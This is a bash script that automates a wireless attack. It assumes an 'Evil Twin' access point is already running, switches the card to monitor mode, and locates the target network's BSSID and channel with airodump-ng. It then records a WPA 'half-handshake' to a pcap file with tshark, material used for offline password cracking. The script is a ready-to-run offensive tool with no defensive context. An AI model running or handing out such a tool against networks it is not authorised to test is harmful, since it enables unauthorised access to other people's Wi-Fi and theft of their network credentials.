#!/bin/bash

if [ "$#" -lt 2 ]; then
        echo "usage: ./half-handshake <wireless interface> <target SSID>"
        exit 1
fi

IFACE=${1}
SSID=${2}

read -p "Evil Twin deployed? [Enter]"
sudo airmon-ng check kill
sudo airmon-ng start $IFACE
clear

read -p "Enter Q twice to quit airodump-ng once $SSID appears [Enter]"
sudo airodump-ng $IFACE -w dump -I 1 --output-format csv
clear

BSSID=$(grep -m 1 "$SSID" dump-01.csv | awk -F',' '{ print $1 }')
CHANNEL=$(grep -m 1 "$SSID" dump-01.csv | awk -F',' '{ print $4 }')
rm -f dump-01.csv

echo $SSID is on channel $CHANNEL with BSSID $BSSID
read -p "Ready to capture half-handshake. Enter capture length in seconds to begin: " CAPTIME

sudo airodump-ng $IFACE -c $CHANNEL &> /dev/null & 
tshark -i wlan0 -w half-handshake.pcap -a duration:$CAPTIME &> /dev/null &

while [ $CAPTIME -ge 1 ]; do
        echo $CAPTIME
        ((CAPTIME=CAPTIME-1))
        sleep 1
done
